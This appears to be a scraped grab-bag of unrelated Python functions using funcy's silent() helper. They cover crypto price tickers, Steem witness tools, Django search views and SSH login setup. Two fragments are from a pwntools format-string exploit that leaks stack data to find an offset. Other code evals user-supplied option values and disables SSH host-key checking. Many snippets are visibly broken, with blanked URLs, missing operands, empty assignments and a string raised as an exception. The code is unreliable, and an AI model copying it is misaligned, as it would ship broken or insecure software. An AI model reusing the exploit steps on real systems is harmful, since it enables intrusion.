def test_3(): path = 'urls_.yml' silent(os.remove)(path) with track_function( 'yaml.load', path, ): yaml.load('a/5/b') yaml.load('a/9/b') yaml.load('a/3/b') assert os.path.exists(path) with open(path) as f: print() print( silent(os.remove)(path)
def parse_tickets(text): result = {'tickets': {}, 'warnings': []} # Parse total number of tickets total_s, ticket_s = re.split(r'30\s*000', text, 2) result['total'] = silent(int)(re.sub(r'\D', '', re_find(r'[\d\s]+\D*$', total_s))) # Parse (nick, ticket count) pairs known_names = read_names() ticket_pairs = re.findall(r'(\w[\w\d \|]*)\W+((?:\w )?[\doOоО]+\b)?', ticket_s) tickets = {} for name, count in ticket_pairs: # Check if name is known or similar enough to known one name, warning = parse_name(name) if warning: result['warnings'].append(warning) if name is None: continue # Parse number part count = parse_number(count) if count is None: result['warnings'].append('No count for %s' % name) if count is not None: result['tickets'][name] = count return result
def sbd_btc_ticker(verbose=False): prices = {} urls = [ "", "", ] responses = list(silent(requests.get)(u, timeout=30) for u in urls) for r in [x for x in responses if hasattr(x, "status_code") and x.status_code == 200 and x.json()]: if "poloniex" in r.url: with suppress(KeyError): data = r.json()["BTC_SBD"] if verbose: print("Spread on Poloniex is %.2f%%" % Tickers.calc_spread(data['highestBid'], data['lowestAsk'])) prices['poloniex'] = { 'price': float(data['last']), 'volume': float(data['baseVolume'])} elif "bittrex" in r.url: with suppress(KeyError): data = r.json()["result"][0] if verbose: print("Spread on Bittrex is %.2f%%" % Tickers.calc_spread(data['Bid'], data['Ask'])) price = (data['Bid'] + data['Ask']) / 2 prices['bittrex'] = {'price': price, 'volume': data['BaseVolume']} if len(prices) == 0: raise RuntimeError("Obtaining SBD/BTC prices has failed from all sources.") return Tickers._wva( [x['price'] for x in prices.values()], [x['volume'] for x in prices.values()])
def update(): """Update witness properties.""" c = get_config() c['witness']['url'] = click.prompt( 'What should be your witness URL?', default=c['witness']['url'], ) creation_fee = click.prompt( 'How much do you want the account creation fee to be (STEEM)?', default=c['props']['account_creation_fee'], ) if silent(float)(creation_fee): creation_fee = "%s STEEM" % float(creation_fee) c['props']['account_creation_fee'] = str(Amount(creation_fee)) c['props']['maximum_block_size'] = click.prompt( 'What should be the maximum block size?', default=c['props']['maximum_block_size'], ) c['props']['sbd_interest_rate'] = click.prompt( 'What should be the SBD interest rate?', default=c['props']['sbd_interest_rate'], ) # verify output(c, '\nConfiguration') click.confirm('Do you want to commit the updated values?', abort=True) # update set_config(c) witness_set_props(c['witness']['url'], c['props']) output('Witness %s Updated' % c['witness']['name'])
def take(self, limit=5): """ Take up to n (n = limit) posts/comments at a time. You can call this method as many times as you want. Once there are no more posts to take, it will return []. Returns: List of posts/comments in a batch of size up to `limit`. """ # get main posts only comment_filter = is_comment if self.comments_only else complement( is_comment) hist = filter(comment_filter, self.history) # filter out reblogs hist2 = filter(lambda x: x["author"] ==, hist) # post edits will re-appear in history # we should therefore filter out already seen posts def ensure_unique(post): if post["permlink"] not in self.seen_items: self.seen_items.add(post["permlink"]) return True unique = filter(ensure_unique, hist2) serialized = filter(bool, map(silent(Post), unique)) batch = take(limit, serialized) return batch
def steem_btc_ticker(): prices = {} urls = [ "", "", "", ] responses = list(silent(requests.get)(u, timeout=30) for u in urls) for r in [x for x in responses if hasattr(x, "status_code") and x.status_code == 200 and x.json()]: if "poloniex" in r.url: with suppress(KeyError): data = r.json()["BTC_STEEM"] prices['poloniex'] = { 'price': float(data['last']), 'volume': float(data['baseVolume'])} elif "bittrex" in r.url: with suppress(KeyError): data = r.json()["result"][0] price = (data['Bid'] + data['Ask']) / 2 prices['bittrex'] = {'price': price, 'volume': data['BaseVolume']} elif "binance" in r.url: with suppress(KeyError): data = [x for x in r.json() if x['symbol'] == 'STEEMBTC'][0] prices['binance'] = { 'price': float(data['lastPrice']), 'volume': float(data['quoteVolume'])} if len(prices) == 0: raise RuntimeError("Obtaining STEEM/BTC prices has failed from all sources.") return Tickers._wva( [x['price'] for x in prices.values()], [x['volume'] for x in prices.values()])
def calc_clicked(self): time.sleep(1) self.browser_visit('dashboard') #logging.warn("finding element by xpath") elem = self.browser.find_by_xpath( '/html/body/table[2]/tbody/tr/td[2]/table/tbody/tr/td[2]/table[2]/tbody/tr/td' ) # The click status box says: <div align="center"><strong><font color="#FFFFFF">Surf Clicked Today: 0<br>You have clicked on 10 ads within the last 24 hours<br> # The click status box says: <div align="center"><strong><font color="#FFFFFF">Surf Clicked Today: 6<br>You have NOT clicked on 10 ads within the last 24 hours<br> html = get_element_html(self.browser.driver, elem[0]._element) find = html.find("You have NOT clicked on") print("HTML={0}. Find={1}.".format(html, find)) if html.find("You have NOT clicked on") != -1: return -1 else: clicked = funcy.silent(int)( funcy.re_find(r'You have clicked on (\d+)', html)) return clicked raise("Could not calculate clicked.")
class Story(Model, Node): _schema = story_schema def _on_init(self): try: self._validate() except Exception as e: print('ERROR in validation for Story:') print() print(str(e)) print() print(self._yaml()) print() mpd = property(lambda self: get_manifest(self)) image = property(lambda self: get_image_url(self)) video = property(lambda self: get_video_url(self)) __repr__ = lambda self: f'Story(pk={})' location = property(lambda self: fallback( lambda: self['story_locations'][0]['location'], lambda: self[ 'story_locations']['location'], lambda: None)) geotag: compose( property, silent)(lambda self: self['story_locations'][0]['location']) swipeup_url = property( silent(lambda self: self['story_cta'][0]['links'][0]['webUri'])) spotyfy_song = property( lambda self: self['story_app_attribution']['content_url'])
def refresh(self): post_author, post_permlink = resolve_identifier(self.identifier) post = self.steemd.get_content(post_author, post_permlink) if not post["permlink"]: raise PostDoesNotExist("Post does not exist: %s" % self.identifier) # If this 'post' comes from an operation, it might carry a patch if "body" in post and re.match("^@@", post["body"]): self.patched = True # TODO: Check # This field is returned from blockchain, but it's empty. Fill it post['reblogged_by'] = [i for i in self.steemd.get_reblogged_by(post_author, post_permlink) if i != post_author] # Parse Times parse_times = ["active", "cashout_time", "created", "last_payout", "last_update", "max_cashout_time"] for p in parse_times: post[p] = parse_time(post.get(p, "1970-01-01T00:00:00")) # Parse Amounts sbd_amounts = [ 'total_payout_value', 'max_accepted_payout', 'pending_payout_value', 'curator_payout_value', 'total_pending_payout_value', 'promoted', ] for p in sbd_amounts: post[p] = Amount(post.get(p, "0.000 GBG")) # calculate trending and hot scores for sorting post['score_trending'] = calculate_trending(post.get('net_rshares', 0), post['created']) post['score_hot'] = calculate_hot(post.get('net_rshares', 0), post['created']) # turn json_metadata into python dict meta_str = post.get("json_metadata", "{}") post['json_metadata'] = silent(json.loads)(meta_str) or {} post["tags"] = [] post['community'] = '' if isinstance(post['json_metadata'], dict): if post["depth"] == 0: tags = [post["parent_permlink"]] tags += get_in(post, ['json_metadata', 'tags'], default=[]) tags_set = set(tags) post["tags"] = [tag for tag in tags if tag not in tags_set] post['community'] = get_in(post, ['json_metadata', 'community'], default='') # If this post is a comment, retrieve the root comment self.root_identifier, self.category = self._get_root_identifier(post) self._store_post(post)
def test_track_class(): path = 'urls_.yml' silent(os.remove)(path) with track_method( 'xxx.Klass', 'ciao', path, ): x = Klass() x.ciao('a/1/b') x.ciao('a/2/b') x.ciao('a/8/b') assert os.path.exists(path) with open(path) as f: print() print( silent(os.remove)(path)
def register_apps(app): for pkg in w_utils.find_modules('apps', True): pkg_views = '%s.views' % pkg objs = [get_module_obj(pkg_views, obj) for obj in ['bpa', 'bp']] funcy.walk(funcy.silent(app.register_blueprint), objs) app_init = get_module_obj(pkg, 'app_init') if app_init: app_init(app)
def log(request, analysis_id): analysis = get_object_or_404(Analysis, pk=analysis_id) offset = silent(int)(request.GET.get('offset')) or 0 log_lines = redis_client.lrange('analysis:%s:log' % analysis_id, offset, -1) if request.is_ajax(): return JsonResponse(log_lines, safe=False) else: return {'analysis': analysis, 'log_lines': log_lines}
def parse_option(string): if '=' not in string: string += '=' name, value = re.split('=', string) if value == '': value = False if name.startswith('-no-') else True else: value = fn.silent(eval)(value) or value name = re.sub('-', '_', re.sub('^(-no-|-)', '', name)) return variables.option._replace(name=name, value=value)
def btc_usd_ticker(verbose=False): prices = {} urls = [ "", "", "", "", "", ] responses = list(silent(requests.get)(u, timeout=30) for u in urls) for r in [x for x in responses if hasattr(x, "status_code") and x.status_code == 200 and x.json()]: if "bitfinex" in r.url: with suppress(KeyError): data = r.json() prices['bitfinex'] = { 'price': float(data['last_price']), 'volume': float(data['volume'])} elif "gdax" in r.url: with suppress(KeyError): data = r.json() prices['gdax'] = { 'price': float(data['price']), 'volume': float(data['volume'])} elif "kraken" in r.url: with suppress(KeyError): data = r.json()['result']['XXBTZUSD']['p'] prices['kraken'] = { 'price': float(data[0]), 'volume': float(data[1])} elif "okcoin" in r.url: with suppress(KeyError): data = r.json()["ticker"] prices['okcoin'] = { 'price': float(data['last']), 'volume': float(data['vol'])} elif "bitstamp" in r.url: with suppress(KeyError): data = r.json() prices['bitstamp'] = { 'price': float(data['last']), 'volume': float(data['volume'])} if verbose: pprint(prices) if len(prices) == 0: raise RuntimeError("Obtaining BTC/USD prices has failed from all sources.") # vwap return Tickers._wva( [x['price'] for x in prices.values()], [x['volume'] for x in prices.values()])
def time_command(cmd): cprint('Timing "%s": ' % cmd, "green") # We will collect unbuffered output with timestamps to measure hang ups. # Python buffers output when it's redirected, so this is critical. output = [] env = {**os.environ, "PYTHONUNBUFFERED": "x", "COLUMNS": str(get_cols())} start = time.monotonic() # Execute command with output redirected to pipe and unbuffered proc = subprocess.Popen( cmd, bufsize=0, shell=True, env=env, cwd=_cwd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, ) # Collect the combined output as it goes while True: chunk = if not chunk: break output.append((time.monotonic(), chunk)) sys.stdout.buffer.write(chunk) sys.stdout.flush() proc.wait() end = time.monotonic() # Fail loudly and stop the benchmark if proc.returncode != 0: raise Exception('Command "{}" failed with code {}'.format( cmd, proc.returncode)) total = end - start cprint("%s s" % total, "green") # from pprint import pprint # pprint(output) return { "total": total, "in": output[0][0] - start if output else None, "out": end - output[-1][0] if output else None, "sleep": silent(max)(r[0] - l[0] for l, r in pairwise(output)), "output": output, }
def get_series_tag_history(): series_tag_history = { 'created': defaultdict(int), 'validated': defaultdict(int), 'invalidated': defaultdict(int) } qs = SeriesTag.objects.filter( is_active=True).prefetch_related('validations') for tag in tqdm(qs, total=qs.count(), desc='series tag history'): validations = list(tag.validations.all()) series_tag_history['created'][ceil_date(tag.created_on)] += 1 validated = silent(min)(v.created_on for v in validations if v.annotation_kappa == 1) if validated: series_tag_history['validated'][ceil_date(validated)] += 1 invalidated = silent(min)(v.created_on for v in validations if v.agrees_with is not None) if invalidated: series_tag_history['invalidated'][ceil_date(invalidated)] += 1 return walk_values(accumulate, series_tag_history)
def parse_number(s): # Replace all sorts of Os, english and russian s = re.sub(r'[oOоО]', '0', s) numbers = re.findall(r'\d+', s) # Filter out single digits as noise if len(numbers) > 1: numbers = [s for s in numbers if len(s) > 1] if len(numbers) != 1: return None return silent(int)(numbers[0])
def check_from_class(check_class: type, obj, *checker_args, **checker_kwargs): failures = [] advice = [] for Checker in get_subclasses(check_class): checker = Checker(*checker_args, **checker_kwargs) check = checker.do_check success = check(obj) if not success: failures.append(Checker.__name__) advice_item = silent(checker.give_advice)(obj) advice.append(advice_item) valid = not failures return valid, failures, advice
def init(): """Add your witness account.""" account = click.prompt('What is your witness account name?', type=str) witness = get_witness(account) if witness: c = new_config() c['witness']['name'] = account c['witness']['url'] = witness['url'] c['props'] = witness['props'] set_config(c) echo('Imported a witness %s from its existing settings.' % account) else: click.confirm('Witness %s does not exist. Would you like to create it?' % account, abort=True) c = new_config() c['witness']['name'] = account c['witness']['url'] = click.prompt( 'What should be your witness URL?', default=c['witness']['url'], ) creation_fee = click.prompt( 'How much do you want the account creation fee to be (STEEM)?', default=c['props']['account_creation_fee'], ) if silent(float)(creation_fee): creation_fee = "%s STEEM" % float(creation_fee) c['props']['account_creation_fee'] = str(Amount(creation_fee)) c['props']['maximum_block_size'] = click.prompt( 'What should be the maximum block size?', default=c['props']['maximum_block_size'], ) c['props']['sbd_interest_rate'] = click.prompt( 'What should be the SBD interest rate?', default=c['props']['sbd_interest_rate'], ) c['props']['account_subsidy_budget'] = click.prompt( 'What should be the account subsidy budget?', default=c['props']['account_subsidy_budget'], ) c['props']['account_subsidy_decay'] = click.prompt( 'What should be the account subsidy decay?', default=c['props']['account_subsidy_decay'], ) set_config(c) witness_create(c) echo('Witness %s created!' % account)
def duration(text): regexes = [ r'()(?:(\d\d):)?(\d\d):(\d\d)(?:\s|$)', re.compile( r'''\s* (?:(\d+)\s*д[еньяй.]*)? \s* (?:(\d+)\s*ч[ас.]*)? \s* (?:(\d+)\s*м[инуты.]*)? ()''', re.I | re.X) ] for regex in regexes: m = re_find(regex, text) if m: days, hours, minutes, seconds = [ silent(int)(p) or 0 for p in m ] if days == hours == minutes == 0: return None return (days * 24 + hours * 60 + minutes) * 60 + seconds
def search(request): q = request.GET.get('q') if not q: return {'series': None} exclude_tags = keep(silent(int), request.GET.getlist('exclude_tags')) serie_tags, tag_series, tag_ids = series_tags_data() q_string, q_tags = _parse_query(q) q_tags, wrong_tags = split(lambda t: t.lower() in tag_ids, q_tags) if wrong_tags: message = 'Unknown tag%s %s.' % ('s' if len(wrong_tags) > 1 else '', ', '.join(wrong_tags)) messages.warning(request, message) if not q_string and not q_tags: return {'series': None} qs = search_series_qs(q_string) if q_tags: q_tag_ids = keep(tag_ids.get(t.lower()) for t in q_tags) include_series = reduce(set.intersection, (tag_series[t] for t in q_tag_ids)) if include_series: qs = qs.filter(id__in=include_series) else: message = 'No series annotated with %s.' \ % (q_tags[0] if len(q_tags) == 1 else 'all these tags simultaneously') messages.warning(request, message) return {'series': []} if exclude_tags: exclude_series = join(tag_series[t] for t in exclude_tags) qs = qs.exclude(id__in=exclude_series) series_ids = qs.values_list('id', flat=True) tags = distinct(imapcat(serie_tags, series_ids), key=itemgetter('id')) # TODO: do not hide excluded tags return { 'series': qs, 'tags': tags, 'serie_tags': serie_tags, }
# # To do this, we will create a symlink to the target binary # with a large cyclic name, and search for the pattern on # the stack. # symlink = cyclic(0x20) offset = -1 shell.ln(['-s', binary, symlink]) # Params of (110,120) chosen after letting it run (0,500) once. # This is just quicker since I'm running it multiple times to dev. for index in range(110, 120): ch ='python ./%s' % symlink) ch.sendline('%{}$X'.format(index)) response = ch.recvline().strip() data = silent(unhex)(response) if data is None or len(data) != 4: continue offset = cyclic_find(data[::-1]) if 0 <= offset and offset < 0x100: break"Found binary name on stack in argument %i at offset %i" % (index, offset)) # # Step 1B # # Put the addresses that we want to patch in the name # of the symlink, and reference them as arguments from
def search(request): # Save last specie in session specie = request.GET.get('specie') if specie != request.session.get('specie'): request.session['specie'] = specie q = request.GET.get('q') if not q: return {'series': None} exclude_tags = lkeep(silent(int), request.GET.getlist('exclude_tags')) series_tags, tag_series, tag_ids = series_tags_data() # Parse query q_string, q_tags = _parse_query(q) q_tags, wrong_tags = lsplit(lambda t: t.lower() in tag_ids, q_tags) if wrong_tags: message = 'Unknown tag%s %s.' % ('s' if len(wrong_tags) > 1 else '', ', '.join(wrong_tags)) messages.warning(request, message) if not q_string and not q_tags: return {'series': None} # Build qs qs = search_series_qs(q_string) if specie: qs = qs.filter(specie=specie) if q_tags: q_tag_ids = lkeep(tag_ids.get(t.lower()) for t in q_tags) include_series = reduce(set.intersection, (tag_series[t] for t in q_tag_ids)) if include_series: qs = qs.filter(id__in=include_series) else: message = 'No series annotated with %s.' \ % (q_tags[0] if len(q_tags) == 1 else 'all these tags simultaneously') messages.warning(request, message) return {'series': []} series_ids = qs.values_list('id', flat=True).order_by() tags = ldistinct(mapcat(series_tags, series_ids), key=itemgetter('id')) if exclude_tags: exclude_series = join(tag_series[t] for t in exclude_tags) qs = qs.exclude(id__in=exclude_series) series = paginate(request, qs, 10) # Get annotations statuses annos_qs = SeriesAnnotation.objects.filter(series__in=series) \ .values_list('series_id', 'tag_id', 'best_cohens_kappa') tags_validated = {(s, t): k == 1 for s, t, k in annos_qs} return dict( { 'series': series, 'page': series, 'tags_validated': tags_validated, 'tags': tags, 'series_tags': series_tags, }, **_search_stats(qs))
def get_replies(self): """ Return **first-level** comments of the post. """ post_author, post_permlink = resolve_identifier(self.identifier) replies = self.steemd.get_content_replies(post_author, post_permlink) return map(silent(Post), replies)
def _try_get_ssh_config_port(user_ssh_config): return silent(int)(user_ssh_config.get("port"))
# with a large cyclic name, and search for the pattern on # the stack. # symlink = cyclic(0x20) offset = -1 shell.ln(['-s',binary, symlink]) # Params of (110,120) chosen after letting it run (0,500) once. # This is just quicker since I'm running it multiple times to dev. for index in range(110,120): ch ='python ./%s' % symlink) ch.sendline('%{}$X'.format(index)) response = ch.recvline().strip() data = silent(unhex)(response) if data is None or len(data) != 4: continue offset = cyclic_find(data[::-1]) if 0 <= offset and offset < 0x100: break"Found binary name on stack in argument %i at offset %i" % (index, offset)) # # Step 1B # # Put the addresses that we want to patch in the name # of the symlink, and reference them as arguments from # print.
'study_area_description/citable_classification_system', 'study_area_description/name', 'design_description', 'id') data = _dumb_parse(e, keys) data['personnel'] = [_parse_agent(el) for el in e.findall('personnel')] return data def _parse_additional(e): url = _text(e.find('resourceLogoUrl')) if url: url = urlparse(url)._replace(path='/').geturl() description = _text(e.find('citation')) return {'url': url, 'description': description, 'name': 'Source archive'} def unlinkify_para(para): result = para.text for child in para.iterchildren(): child_text = ''.join(list(child.itertext())) child_url = child.attrib.get('url') if child_url: child_text = '[{}]({})'.format(child_text, child_url) result += child_text + child.tail return result _get_content = silent(attrgetter('content'))
def scrape_comments(mongo, batch_size=250, max_workers=50): """ Parse operations and post-process for comment/post extraction. """ indexer = Indexer(mongo) start_block = indexer.get_checkpoint('comments') query = { "type": "comment", "block_num": { "$gt": start_block, "$lte": start_block + batch_size, } } projection = { '_id': 0, 'block_num': 1, 'author': 1, 'permlink': 1, } results = list(mongo.Operations.find(query, projection=projection)) identifiers = set(f"{x['author']}/{x['permlink']}" for x in results) # handle an edge case when we are too close to the head, # and the batch contains no work to do if not results and is_recent(start_block, days=1): return # get Post.export() results in parallel raw_comments = thread_multi(fn=get_comment, fn_args=[None], dep_args=list(identifiers), max_workers=max_workers, yield_results=True) raw_comments = lkeep(raw_comments) # split into root posts and comments posts = lfilter(lambda x: x['depth'] == 0, raw_comments) comments = lfilter(lambda x: x['depth'] > 0, raw_comments) # Mongo upsert many log_output = '' if posts: r = mongo.Posts.bulk_write( [ UpdateOne({'identifier': x['identifier']}, {'$set': { **x, 'updatedAt': dt.datetime.utcnow() }}, upsert=True) for x in posts ], ordered=False, ) log_output += \ f'(Posts: {r.upserted_count} upserted, {r.modified_count} modified) ' if comments: r = mongo.Comments.bulk_write( [ UpdateOne({'identifier': x['identifier']}, {'$set': { **x, 'updatedAt': dt.datetime.utcnow() }}, upsert=True) for x in comments ], ordered=False, ) log_output += \ f'(Comments: {r.upserted_count} upserted, {r.modified_count} modified) ' # We are only querying {type: 'comment'} blocks and sometimes # the gaps are larger than the batch_size. index = silent(max)(lpluck('block_num', results)) or (start_block + batch_size) indexer.set_checkpoint('comments', index)'Checkpoint: {index} {log_output}')
def _prepare_credentials(self, **config): self.CAN_TRAVERSE = True from sshfs.config import parse_config login_info = {} try: user_ssh_config = parse_config(host=config["host"]) except FileNotFoundError: user_ssh_config = {} login_info["host"] = user_ssh_config.get("Hostname", config["host"]) login_info["username"] = (config.get("user") or config.get("username") or user_ssh_config.get("User") or getpass.getuser()) login_info["port"] = (config.get("port") or silent(int)(user_ssh_config.get("Port")) or self.DEFAULT_PORT) if config.get("ask_password") and config.get("password") is None: config["password"] = ask_password(login_info["host"], login_info["username"], login_info["port"]) login_info["password"] = config.get("password") login_info["passphrase"] = config.get("password") raw_keys = [] if config.get("keyfile"): raw_keys.append(config.get("keyfile")) elif user_ssh_config.get("IdentityFile"): raw_keys.extend(user_ssh_config.get("IdentityFile")) if raw_keys: login_info["client_keys"] = [ os.path.expanduser(key) for key in raw_keys ] login_info["timeout"] = config.get("timeout", _SSH_TIMEOUT) # These two settings fine tune the asyncssh to use the # fastest encryption algorithm and disable compression # altogether (since it blocking, it is slowing down # the transfers in a considerable rate, and even for # compressible data it is making it extremely slow). # See: login_info["encryption_algs"] = [ "*****@*****.**", "aes256-ctr", "aes192-ctr", "aes128-ctr", ] login_info["compression_algs"] = None login_info["gss_auth"] = config.get("gss_auth", False) login_info["agent_forwarding"] = config.get("agent_forwarding", True) login_info["proxy_command"] = user_ssh_config.get("ProxyCommand") # We are going to automatically add stuff to known_hosts # something like paramiko's AutoAddPolicy() login_info["known_hosts"] = None return login_info